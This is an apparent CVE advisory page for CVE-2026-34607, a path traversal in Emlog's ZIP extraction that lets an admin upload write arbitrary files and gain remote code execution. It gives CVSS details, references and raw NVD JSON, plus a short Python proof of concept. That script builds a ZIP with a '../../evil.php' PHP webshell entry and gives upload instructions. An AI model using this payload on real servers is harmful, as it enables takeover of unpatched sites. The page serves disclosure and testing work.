CVE-2026-34607

Description

Emlog is an open source website building system. In versions 2.6.2 and prior, a path traversal vulnerability exists in the emUnZip() function (include/lib/common.php:793). When extracting ZIP archives (plugin/template uploads, backup imports), the function calls $zip->extractTo($path) without sanitizing ZIP entry names. An authenticated admin can upload a crafted ZIP containing entries with ../ sequences to write arbitrary files to the server filesystem, including PHP webshells, achieving Remote Code Execution (RCE). At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:* - VULNERABLE

Emlog <= 2.6.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile

# Create a malicious ZIP file containing a PHP webshell
# The filename uses '../' to traverse out of the extraction directory
malicious_filename = "../../evil.php"
webshell_content = "<?php system($_GET['cmd']); ?>"

with zipfile.ZipFile('exploit.zip', 'w') as zf:
    # Write the webshell content with the traversal path
    zf.writestr(malicious_filename, webshell_content)

print("Malicious ZIP file 'exploit.zip' created successfully.")
print("Upload this file as a plugin or template backup in the Emlog admin panel.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34607/
[4] VulDB https://vuldb.com/cve/CVE-2026-34607
[5] https://github.com/emlog/emlog/security/advisories/GHSA-2jg8-rmhm-xv9m
[6] https://github.com/emlog/emlog/security/advisories/GHSA-2jg8-rmhm-xv9m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34607", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:04.423", "lastModified": "2026-04-13T17:37:26.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. In versions 2.6.2 and prior, a path traversal vulnerability exists in the emUnZip() function (include/lib/common.php:793). When extracting ZIP archives (plugin/template uploads, backup imports), the function calls $zip->extractTo($path) without sanitizing ZIP entry names. An authenticated admin can upload a crafted ZIP containing entries with ../ sequences to write arbitrary files to the server filesystem, including PHP webshells, achieving Remote Code Execution (RCE). At time of publication, there are no publicly available patches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:*", "versionEndIncluding": "2.6.2", "matchCriteriaId": "87AE63DC-4F2B-44E3-8865-B6166722A5D6"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/security/advisories/GHSA-2jg8-rmhm-xv9m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/emlog/emlog/security/advisories/GHSA-2jg8-rmhm-xv9m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}